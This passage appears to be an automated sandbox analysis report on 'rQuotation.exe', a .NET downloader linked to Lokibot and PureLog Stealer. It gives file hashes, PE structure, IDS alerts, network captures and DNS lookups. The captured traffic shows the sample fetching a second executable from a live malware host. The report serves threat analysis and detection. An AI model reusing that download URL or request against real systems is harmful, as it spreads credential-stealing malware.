Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: rQuotation.exe

Simulations

Behavior and APIs

Time	Type	Description
07:15:04	API Interceptor	17x Sleep call for process: rQuotation.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.153.63	6SQADa3zKv.exe	Get hash	malicious	Lokibot, PureLog Stealer, zgRAT	Browse	dddotx.shop/Mine/PWS/fre.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
dddotx.shop	XE5p2qNoWt.exe	Get hash	malicious	Lokibot, PureLog Stealer, zgRAT	Browse	104.21.12.202
	6SQADa3zKv.exe	Get hash	malicious	Lokibot, PureLog Stealer, zgRAT	Browse	172.67.153.63
	Quotation.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	104.21.12.202
	rPedidodecompra__PO20441__ARIMComponentes.exe	Get hash	malicious	Lokibot, PureLog Stealer, zgRAT	Browse	188.114.96.3
	1e#U0414.exe	Get hash	malicious	Lokibot	Browse	188.114.96.3
	(PO403810)_VOLEX_doc.exe	Get hash	malicious	Lokibot	Browse	188.114.97.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://afw.soundestlink.com/ce/c/675c127e5a5226f9e7b86686/675c13ae85cd17d1e3e2ab54/675c13c9f9a08fb1fbb3e577?signature=3f4d77f7452e61cf1e0cb9ce4a3540d02af0944caf975b089573a2fc1d891103	Get hash	malicious	Unknown	Browse	172.67.163.209
	http://898.tv/Lantekqs	Get hash	malicious	Unknown	Browse	104.16.62.16
	Herinnering.msg	Get hash	malicious	Unknown	Browse	172.66.0.227
	PAYMENT RECEIPT.html	Get hash	malicious	HTMLPhisher	Browse	104.18.24.163
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	104.21.50.161
	PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe	Get hash	malicious	GuLoader	Browse	104.21.67.152
	rDOC24INV0616.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	UUH30xVTpr.exe	Get hash	malicious	LummaC, Stealc	Browse	172.67.164.37
	4TPPuMwzSA.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	104.21.50.161
	yYJUaOwKa8.exe	Get hash	malicious	LummaC	Browse	172.67.164.37

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	invoice.html	Get hash	malicious	Unknown	Browse	172.67.153.63
	rDOC24INV0616.exe	Get hash	malicious	AgentTesla	Browse	172.67.153.63
	https://t.co/eSJUUrWOcO	Get hash	malicious	HTMLPhisher	Browse	172.67.153.63
	NOTIFICATION_OF_DEPENDANTS.vbs	Get hash	malicious	Unknown	Browse	172.67.153.63
	InvoiceNr274728.pdf.lnk	Get hash	malicious	Unknown	Browse	172.67.153.63
	A6IuJ5NneS.lnk	Get hash	malicious	LummaC	Browse	172.67.153.63
	KlarnaInvoice229837.pdf.lnk	Get hash	malicious	LummaC	Browse	172.67.153.63
	Arrival Notice.vbs	Get hash	malicious	Remcos, GuLoader	Browse	172.67.153.63
	SWIFT091816-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.67.153.63
	REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.67.153.63

Process:	C:\Users\user\Desktop\rQuotation.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.345615485833535
Encrypted:	false
SSDEEP:	24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
MD5:	EEEC189088CC5F1F69CEE62A3BE59EA2
SHA1:	250F25CE24458FC0C581FDDF59FAA26D557844C5
SHA-256:	5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
SHA-512:	2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	4.801295426326709
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	rQuotation.exe
File size:	130'560 bytes
MD5:	dca8bdefe8237a48128806ff688ac05a
SHA1:	6ebb0844c2d34d0fcc21a903d43757a5d238273d
SHA256:	c390804ad264760c94d771b4e8326ba728624673b6900d664d2faff699480fc2
SHA512:	0d2a21abed6f319200ef19155aa3673d75fb2d141710926ff5d5185fecc978956a94aeefba9f352ee1de5b6655f68655756f627455542fb6e61144f6c3b21fad
SSDEEP:	768:pEC6hHEQS0a5gzQKosk3jo6l9M8GeD24thF07INvu+FlmQYRaxlKqxk2GZ2GzmuZ:ESJMQICjJl9LGcxDNXltYbqQmuj9
TLSH:	CDD3A535B2835321C41B0EB5D0EE352C03B29F4BA277D69AE88C33F54EF17D19A86619
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T.................0.............~.... ... ....@.. .......................`............`................................

File Icon


Icon Hash:	1a5ada12a98c3689

Static PE Info

General

Entrypoint:	0x41087e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x9E09E354 [Thu Jan 8 01:22:28 2054 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x10830	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x12000	0x10e54	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x24000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x107e6	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xe884	0xea00	6b85af04ee8df69b6c1200c1372c0d44	False	0.44012086004273504	Applesoft BASIC program data, first line number 1	5.771795430516578	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x12000	0x10e54	0x11000	a22b0fd7056d76defe46070a8624efbc	False	0.056597541360294115	data	2.6809687333439816	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x24000	0xc	0x200	efffbd905373a34c102543d2187f6088	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x12130	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	0.046891636105524666
RT_GROUP_ICON	0x22958	0x14	data	1.15
RT_VERSION	0x2296c	0x2fc	data	0.43586387434554974
RT_MANIFEST	0x22c68	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-16T13:15:07.027308+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49708	172.67.153.63	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 16, 2024 13:15:02.970251083 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:02.970305920 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:02.970458984 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:02.979619980 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:02.979631901 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:04.198086023 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:04.198163986 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:04.245198011 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:04.245233059 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:04.245579958 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:04.297137976 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:04.555700064 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:04.603348970 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:04.884666920 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:04.884702921 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:04.884735107 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:04.884756088 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:04.884768009 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:04.884805918 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:04.884814978 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:04.884820938 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:04.884848118 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:04.884862900 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:04.896116018 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:04.896176100 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:04.896182060 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:04.904486895 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:04.904536009 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:04.904541016 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:04.953378916 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:05.004534960 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.047133923 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:05.047148943 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.080059052 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.080121994 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:05.080128908 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.090159893 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.090194941 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.090224028 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:05.090229988 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.090266943 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:05.098345041 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.106146097 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.106199980 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:05.106205940 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.114367008 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.114428043 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:05.114434004 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.122692108 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.122747898 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:05.122752905 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.130768061 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.130826950 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:05.130831003 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.139197111 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.139260054 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:05.139264107 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.155469894 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.155497074 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.155529976 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:05.155534983 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.155574083 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:05.163566113 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.171654940 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.171683073 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.171713114 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:05.171717882 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.171761036 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:05.196506977 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.250284910 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:05.267671108 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.271477938 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.271554947 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:05.271567106 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.290260077 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.290272951 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.290339947 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:05.290349960 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.299482107 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.299565077 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:05.299582958 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.299644947 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:05.303874016 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.303926945 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:05.312549114 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.312557936 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.312618017 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:05.316989899 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.316997051 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.317049026 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:05.325505018 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.325514078 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.325570107 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:05.331880093 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.331902027 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.331948996 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:05.335082054 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.335144997 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:05.340780973 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.340887070 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:05.346801043 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.346869946 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:05.349754095 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.349812984 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:05.355645895 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.355720043 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:05.362303972 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.362416983 CET	443	49707	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.362426996 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:05.362493992 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:05.370587111 CET	49707	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:05.372848034 CET	49708	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:05.372890949 CET	443	49708	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:05.372973919 CET	49708	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:05.373164892 CET	49708	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:05.373178005 CET	443	49708	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:06.582312107 CET	443	49708	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:06.585238934 CET	49708	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:06.585253954 CET	443	49708	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:07.027288914 CET	443	49708	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:07.027358055 CET	443	49708	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:07.027400017 CET	443	49708	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:07.027420998 CET	49708	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:07.027431965 CET	443	49708	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:07.027472019 CET	49708	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:07.027477026 CET	443	49708	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:07.027554989 CET	443	49708	172.67.153.63	192.168.2.9
Dec 16, 2024 13:15:07.027592897 CET	49708	443	192.168.2.9	172.67.153.63
Dec 16, 2024 13:15:07.102685928 CET	49708	443	192.168.2.9	172.67.153.63

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 16, 2024 13:15:02.566986084 CET	59036	53	192.168.2.9	1.1.1.1
Dec 16, 2024 13:15:02.964936018 CET	53	59036	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 16, 2024 13:15:02.566986084 CET	192.168.2.9	1.1.1.1	0x4233	Standard query (0)	dddotx.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 16, 2024 13:15:02.964936018 CET	1.1.1.1	192.168.2.9	0x4233	No error (0)	dddotx.shop		172.67.153.63	A (IP address)	IN (0x0001)	false
Dec 16, 2024 13:15:02.964936018 CET	1.1.1.1	192.168.2.9	0x4233	No error (0)	dddotx.shop		104.21.12.202	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

dddotx.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49707	172.67.153.63	443	7704	C:\Users\user\Desktop\rQuotation.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 12:15:04 UTC	73	OUT	GET /BISH_New.exe HTTP/1.1 Host: dddotx.shop Connection: Keep-Alive
2024-12-16 12:15:04 UTC	919	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 12:15:04 GMT Content-Type: application/octet-stream Content-Length: 106496 Connection: close Last-Modified: Mon, 16 Dec 2024 10:00:21 GMT ETag: "1a000-629603f9e9822" Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 5163 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ybbOKVOhwJrqbqQBdeEDtyH%2BqJ57YxncPbYJYcT1lM3xaRKaEjJDDsp0SxroR6xEJC6hbv7gU%2B%2BXcGK7X%2BDFNgQrMM8jHGt%2B4EEgHpyTI8cdKa48pCTBedndlcGfxQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2e98c67f357ca5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1932&min_rtt=1925&rtt_var=737&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=687&delivery_rate=1469552&cwnd=243&unsent_bytes=0&cid=cda519547b79c165&ts=699&x=0"
2024-12-16 12:15:04 UTC	450	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc cd 78 fe 88 ac 16 ad 88 ac 16 ad 88 ac 16 ad 81 d4 95 ad 89 ac 16 ad 4b a3 4b ad 8a ac 16 ad 8d a0 19 ad 89 ac 16 ad 3d 32 f3 ad 8b ac 16 ad 88 ac 16 ad 8c ac 16 ad 81 d4 83 ad 89 ac 16 ad 88 ac 17 ad c7 ac 16 ad 81 d4 85 ad 99 ac 16 ad 3d 32 f7 ad f3 ac 16 ad 3d 32 c8 ad 89 ac 16 ad 52 69 63 68 88 ac 16 ad 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 85 08 6c 57 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$xKK=2=2=2RichPELlW
2024-12-16 12:15:04 UTC	1369	IN	Data Raw: 00 00 00 00 00 00 00 50 01 00 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f5 36 01 00 00 10 00 00 00 38 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 60 40 00 00 00 50 01 00 00 42 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 24 5e 08 00 00 a0 01 00 00 02 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 78 00 00 00 00 00 00 00 20 00 00 00 00 0a 00 00 20 00 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: P\.text68 `.rdata`@PB<@@.data$^~@.x
